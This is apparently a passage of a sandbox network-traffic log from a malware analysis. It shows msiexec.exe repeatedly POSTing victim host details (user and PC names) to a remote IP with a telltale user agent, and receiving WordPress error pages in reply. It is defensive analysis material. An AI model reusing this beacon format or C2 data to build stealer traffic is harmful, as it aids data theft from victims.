                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:00.649719954 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:03.214181900 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:01 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:03.214245081 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:03.214284897 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.549727137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:03.363595009 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:03.369738102 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:06.087287903 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:03 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:06.087312937 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:06.087327003 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:06.087342024 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.549728137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:06.234761000 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:06.239645004 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:08.879153013 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:06 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:08.879168034 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:08.879179955 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.549729137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:09.036484003 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:09.041358948 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:11.705089092 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:09 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:11.705111980 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:11.705123901 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.549731137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:11.884329081 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:11.889230967 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:15.545639992 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:12 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:15.545659065 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:15.545672894 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:15.545685053 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.549732137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:15.688711882 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:15.693619967 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:18.316979885 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:16 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
